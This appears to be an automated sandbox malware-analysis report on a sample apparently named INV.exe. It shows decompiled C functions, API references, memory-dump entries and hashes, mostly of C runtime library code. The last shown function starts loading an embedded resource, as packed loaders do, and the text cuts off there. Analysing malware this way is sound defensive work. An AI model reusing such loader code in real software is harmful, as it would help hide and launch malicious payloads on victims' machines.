                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 01062E5A
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 01062E6D
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 01062E80
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 01062E93
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 01062EA6
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 01062EB9
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 01062ECC
                                        • __mtinitlocks.LIBCMT ref: 0106173D
                                        • __mtterm.LIBCMT ref: 01061746
                                          • Part of subcall function 010617AE: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,0106174B,0106112C,0107CCC0,00000014), ref: 01063182
                                          • Part of subcall function 010617AE: _free.LIBCMT ref: 01063189
                                          • Part of subcall function 010617AE: DeleteCriticalSection.KERNEL32(0107E058,?,?,0106174B,0106112C,0107CCC0,00000014), ref: 010631AB
                                        • __calloc_crt.LIBCMT ref: 0106176B
                                        • __initptd.LIBCMT ref: 0106178D
                                        • GetCurrentThreadId.KERNEL32 ref: 01061794
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                        • String ID:
                                        • API String ID: 3567560977-0
                                        • Opcode ID: 9e2eaf8b389d5b6a00a515416af27ac503c4318ef5a1b4ee7ace770e4f7a4317
                                        • Instruction ID: 11304d4fe9ea5885aab4587ac3a0492065e43b777ef5c1896b8c4a878036415c
                                        • Opcode Fuzzy Hash: 9e2eaf8b389d5b6a00a515416af27ac503c4318ef5a1b4ee7ace770e4f7a4317
                                        • Instruction Fuzzy Hash: ADF09032A197131DF2757A79BC0A7CE2AECBF92630B204A6AF4D4D90C4FF3984418294
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0106879C, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0106879C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t10;
				signed int _t12;
				intOrPtr* _t16;
				intOrPtr* _t31;
				void* _t32;

				_push(8);
				_push(0x107cf60);
				_t10 = E010627F0(__ebx, __edi, __esi);
				_t31 =  *((intOrPtr*)(_t32 + 8));
				if(_t31 != 0) {
					_t12 = E01063117(0xd);
					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
					if( *((intOrPtr*)(_t31 + 4)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t12 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t31 + 4)) != 0x107e5b0) {
							E010632B6( *((intOrPtr*)(_t31 + 4)));
						}
					}
					 *(_t32 - 4) = 0xfffffffe;
					E01068DC1();
					if( *_t31 != 0) {
						E01063117(0xc);
						 *(_t32 - 4) = 1;
						E0106363B( *_t31);
						_t16 =  *_t31;
						if(_t16 != 0 &&  *_t16 == 0 && _t16 != 0x107e2e8) {
							E010634E1(_t16);
						}
						 *(_t32 - 4) = 0xfffffffe;
						E01068DCD();
					}
					_t10 = E010632B6(_t31);
				}
				return E01062835(_t10);
			}








                                        0x01068d1f
                                        0x01068d21
                                        0x01068d26
                                        0x01068d2b
                                        0x01068d30
                                        0x01068d38
                                        0x01068d3e
                                        0x01068d47
                                        0x01068d4c
                                        0x01068d50
                                        0x01068d5e
                                        0x01068d63
                                        0x01068d50
                                        0x01068d64
                                        0x01068d6b
                                        0x01068d73
                                        0x01068d77
                                        0x01068d7d
                                        0x01068d86
                                        0x01068d8c
                                        0x01068d90
                                        0x01068d9f
                                        0x01068da4
                                        0x01068da5
                                        0x01068dac
                                        0x01068dac
                                        0x01068db2
                                        0x01068db7
                                        0x01068dbd

                                        APIs
                                        • __lock.LIBCMT ref: 01068D38
                                          • Part of subcall function 01063117: __mtinitlocknum.LIBCMT ref: 01063129
                                          • Part of subcall function 01063117: __amsg_exit.LIBCMT ref: 01063135
                                          • Part of subcall function 01063117: EnterCriticalSection.KERNEL32(00000000,?,010616CE,0000000D), ref: 01063142
                                        • _free.LIBCMT ref: 01068D5E
                                          • Part of subcall function 010632B6: HeapFree.KERNEL32(00000000,00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632CA
                                          • Part of subcall function 010632B6: GetLastError.KERNEL32(00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632DC
                                        • __lock.LIBCMT ref: 01068D77
                                        • ___removelocaleref.LIBCMT ref: 01068D86
                                        • ___freetlocinfo.LIBCMT ref: 01068D9F
                                        • _free.LIBCMT ref: 01068DB2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                        • String ID:
                                        • API String ID: 626533743-0
                                        • Opcode ID: de853d795705d08363352fa9e35aabc29b0e3a46d5e5f0da43bf2c80df1e49da
                                        • Instruction ID: 205b0c7eafba4a618c5dd71e5056d29ef6abffd32cd48716cb0339ad8747cd66
                                        • Opcode Fuzzy Hash: de853d795705d08363352fa9e35aabc29b0e3a46d5e5f0da43bf2c80df1e49da
                                        • Instruction Fuzzy Hash: A7019231542706DAEBB9BB68D844798B7EC6F30721F24858EE5E86E1D0DF748580C664
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01087BA7, Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: __freea$__alloca_probe_16
                                        • String ID:
                                        • API String ID: 3509577899-0
                                        • Opcode ID: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
                                        • Instruction ID: ba12d05f766bd89723834d416a93fcf7bd807e6db9d38219fbf719da127f4fb7
                                        • Opcode Fuzzy Hash: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
                                        • Instruction Fuzzy Hash: 3D51B173618216ABEB25BF68CC80EBF7BF9EB54650F2546A8EEC4D6144EB34DC40C650
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010659FE, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 96%
                                        			E010659FE(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x10bfd1c, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x10c0a40 - _t7;
								if(__eflags == 0) {
									_t9 = E01064196(__eflags);
									 *_t9 = E010641EF(GetLastError());
									goto L17;
								} else {
									__eflags = E0106455B(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E01064196(__eflags);
										 *_t12 = E010641EF(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0106455B(_t6, _t31);
						 *((intOrPtr*)(E01064196(__eflags))) = 0xc;
						goto L12;
					} else {
						E010632B6(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0106596C(__ebx, __edx, __edi, _a8);
				}
			}









                                        0x01065a05
                                        0x01065a13
                                        0x01065a16
                                        0x01065a18
                                        0x01065a27
                                        0x01065a5a
                                        0x01065a5a
                                        0x01065a5d
                                        0x00000000
                                        0x00000000
                                        0x01065a2a
                                        0x01065a2c
                                        0x01065a2e
                                        0x01065a2e
                                        0x01065a2e
                                        0x01065a3b
                                        0x01065a41
                                        0x01065a43
                                        0x01065a45
                                        0x01065aa5
                                        0x01065aa5
                                        0x01065a47
                                        0x01065a47
                                        0x01065a4d
                                        0x01065a8f
                                        0x01065aa3
                                        0x00000000
                                        0x01065a4f
                                        0x01065a56
                                        0x01065a58
                                        0x01065a77
                                        0x01065a8b
                                        0x01065a71
                                        0x01065a71
                                        0x01065a71
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x01065a58
                                        0x01065a4d
                                        0x00000000
                                        0x01065a73
                                        0x01065a60
                                        0x01065a6b
                                        0x00000000
                                        0x01065a1a
                                        0x01065a1d
                                        0x01065a23
                                        0x01065a23
                                        0x01065a74
                                        0x01065a76
                                        0x01065a07
                                        0x01065a11
                                        0x01065a11

                                        APIs
                                        • _malloc.LIBCMT ref: 01065A0A
                                          • Part of subcall function 0106596C: __FF_MSGBANNER.LIBCMT ref: 01065983
                                          • Part of subcall function 0106596C: __NMSG_WRITE.LIBCMT ref: 0106598A
                                          • Part of subcall function 0106596C: RtlAllocateHeap.NTDLL(014A0000,00000000,00000001,00000000,00000000,00000000,?,0106334C,00000000,00000000,00000000,00000000,?,01063201,00000018,0107CDB0), ref: 010659AF
                                        • _free.LIBCMT ref: 01065A1D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap_free_malloc
                                        • String ID:
                                        • API String ID: 1020059152-0
                                        • Opcode ID: 937b9056f5003ecd589a27dc14c3b5f26625d5ab01c08e165f1c54e5a247252d
                                        • Instruction ID: f78d5f34113f0e61f70c23818527253ab988fdacd78ea6edbdeb71e0048968f4
                                        • Opcode Fuzzy Hash: 937b9056f5003ecd589a27dc14c3b5f26625d5ab01c08e165f1c54e5a247252d
                                        • Instruction Fuzzy Hash: BE118636504716EFDB717F78AC846AD3BDC9F242A0F104566F9D9DA141EB3589408790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0106F3F6, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0106F3F6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E010637C4( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E0106F121( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E01064196(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}
















                                        0x0106f3fe
                                        0x0106f403
                                        0x0106f41d
                                        0x00000000
                                        0x0106f41d
                                        0x0106f405
                                        0x0106f40a
                                        0x00000000
                                        0x00000000
                                        0x0106f40f
                                        0x0106f42c
                                        0x0106f431
                                        0x0106f434
                                        0x0106f43b
                                        0x0106f45a
                                        0x0106f461
                                        0x0106f463
                                        0x0106f4a7
                                        0x0106f4b6
                                        0x0106f4c4
                                        0x0106f4c6
                                        0x0106f4d6
                                        0x0106f4d6
                                        0x0106f4da
                                        0x0106f4dc
                                        0x0106f4df
                                        0x0106f4df
                                        0x0106f4df
                                        0x0106f4df
                                        0x00000000
                                        0x0106f4e5
                                        0x0106f4c8
                                        0x0106f4c8
                                        0x0106f4cd
                                        0x0106f4cd
                                        0x0106f4d0
                                        0x00000000
                                        0x0106f4d0
                                        0x0106f465
                                        0x0106f468
                                        0x0106f46c
                                        0x0106f495
                                        0x0106f495
                                        0x0106f498
                                        0x0106f498
                                        0x00000000
                                        0x00000000
                                        0x0106f49a
                                        0x0106f49e
                                        0x00000000
                                        0x00000000
                                        0x0106f4a0
                                        0x0106f4a0
                                        0x00000000
                                        0x0106f4a0
                                        0x0106f46e
                                        0x0106f471
                                        0x00000000
                                        0x00000000
                                        0x0106f475
                                        0x0106f488
                                        0x0106f48e
                                        0x0106f491
                                        0x0106f493
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106f493
                                        0x0106f43d
                                        0x0106f440
                                        0x0106f442
                                        0x0106f447
                                        0x0106f447
                                        0x0106f44c
                                        0x00000000
                                        0x0106f44c
                                        0x0106f411
                                        0x0106f416
                                        0x0106f41a
                                        0x0106f41a
                                        0x00000000

                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0106F42C
                                        • __isleadbyte_l.LIBCMT ref: 0106F45A
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0106F488
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0106F4BE
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: 44aa95a71bb5189d2112e843e98540059e092f8e3d025ca04baef6c784de186d
                                        • Instruction ID: 9cae400fde65ca157654dee80779df27549578146d198d94eca8352c2391c763
                                        • Opcode Fuzzy Hash: 44aa95a71bb5189d2112e843e98540059e092f8e3d025ca04baef6c784de186d
                                        • Instruction Fuzzy Hash: 3531C330600247AFDB22CE28E854BBA7FF9FF41220F154169E8A497590DB30D850CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010687A1, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E010687A1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				void* _t28;
				intOrPtr* _t40;
				void* _t41;

				_push(0xc);
				_push(0x107cf38);
				E010627F0(__ebx, __edi, __esi);
				_t28 = E010615FE();
				_t40 = E010632EE(8, 1);
				 *((intOrPtr*)(_t41 - 0x1c)) = _t40;
				_t43 = _t40;
				if(_t40 != 0) {
					E010636DB(_t28, __edx, 1, _t40, __eflags);
					E01063AF6(_t28, __edx, 1, _t40, __eflags);
					 *_t40 =  *((intOrPtr*)(_t28 + 0x6c));
					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t28 + 0x68));
					E01063117(0xc);
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					E0106344C( *_t40);
					 *(_t41 - 4) = 0xfffffffe;
					E01068E70();
					E01063117(0xd);
					 *(_t41 - 4) = 1;
					asm("lock xadd [eax], edi");
					__eflags = 2;
					 *(_t41 - 4) = 0xfffffffe;
					E01068E7C();
					_t24 = _t40;
				} else {
					 *((intOrPtr*)(E01064196(_t43))) = 0xc;
					_t24 = 0;
				}
				return E01062835(_t24);
			}







                                        0x01068dd6
                                        0x01068dd8
                                        0x01068ddd
                                        0x01068de7
                                        0x01068df6
                                        0x01068df8
                                        0x01068dfb
                                        0x01068dfd
                                        0x01068e0e
                                        0x01068e13
                                        0x01068e1b
                                        0x01068e20
                                        0x01068e25
                                        0x01068e2b
                                        0x01068e31
                                        0x01068e37
                                        0x01068e3e
                                        0x01068e45
                                        0x01068e4b
                                        0x01068e51
                                        0x01068e55
                                        0x01068e56
                                        0x01068e5d
                                        0x01068e62
                                        0x01068dff
                                        0x01068e04
                                        0x01068e0a
                                        0x01068e0a
                                        0x01068e69

                                        APIs
                                          • Part of subcall function 010615FE: __getptd_noexit.LIBCMT ref: 010615FF
                                          • Part of subcall function 010615FE: __amsg_exit.LIBCMT ref: 0106160C
                                        • __calloc_crt.LIBCMT ref: 01068DEF
                                          • Part of subcall function 010632EE: __calloc_impl.LIBCMT ref: 010632FD
                                        • __lock.LIBCMT ref: 01068E25
                                        • ___addlocaleref.LIBCMT ref: 01068E31
                                        • __lock.LIBCMT ref: 01068E45
                                          • Part of subcall function 01064196: __getptd_noexit.LIBCMT ref: 01064196
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                        • String ID:
                                        • API String ID: 2580527540-0
                                        • Opcode ID: a8f8b39b4fd8b99086203ddb97aabe85cbe9bf1f90d227263d62553b714ea46d
                                        • Instruction ID: ed79b797b199567b6beb09da8a3a6740a72e3d513c320f02d58842ccb50fc915
                                        • Opcode Fuzzy Hash: a8f8b39b4fd8b99086203ddb97aabe85cbe9bf1f90d227263d62553b714ea46d
                                        • Instruction Fuzzy Hash: 32015231A05302EFD720BFB98901B9DB7E8AF65720F10814AE4D99F2D0DB745D41CAA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01072F81, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E01072F81(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E010734F0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E01073025(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E010737A4(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E010736C5(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                        0x01072f84
                                        0x01072f8a
                                        0x01072ffd
                                        0x00000000
                                        0x01072f91
                                        0x01072f91
                                        0x01072f94
                                        0x01072faf
                                        0x01072fb2
                                        0x01072fd2
                                        0x01072fe4
                                        0x01072fb4
                                        0x01072fb4
                                        0x01072fb7
                                        0x00000000
                                        0x01072fb9
                                        0x01072fcb
                                        0x01072fcb
                                        0x01072fb7
                                        0x01073002
                                        0x01073006
                                        0x01072f96
                                        0x01072fae
                                        0x01072fae
                                        0x01072f94

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                        • Instruction ID: a8f7806c986f01df1c3fc52e3d4c6ab4070d4a5267a5bcfa79cf02249f7dcfa9
                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                        • Instruction Fuzzy Hash: 9E01497280014EBBDF275E88CC15CEE3F66BF18354B498565FE9858131D237CAB1AB89
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01082892, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 01082892
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 01082897
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0108289C
                                          • Part of subcall function 01082AB1: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 01082AC2
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 010828B1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                        • String ID:
                                        • API String ID: 1761009282-0
                                        • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                        • Instruction ID: b1c52812ca530411cef9d31a1f07505b78d713714c0642a0fdd6fa815063bdab
                                        • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                        • Instruction Fuzzy Hash: F3C04C3842D223D22C713E7422101ED77404CB269878620C29CC2175038E05410BD433
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0108674A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: ___free_lconv_mon
                                        • String ID: X&A$h&A
                                        • API String ID: 3903695350-2460073903
                                        • Opcode ID: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
                                        • Instruction ID: c89599ffa752a7419cc6ed1d924e3923b80d600b097e28779840c888ba2b925a
                                        • Opcode Fuzzy Hash: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
                                        • Instruction Fuzzy Hash: EB319E71A08602DFEB71BA78D844B9BB7F8BF10310F114A69E4D9D7190EF32E8958B50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Analysis Process: INV.exe PID: 2856 Parent PID: 6348 INV.exeCOMMON

                                        Executed Functions

                                        Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
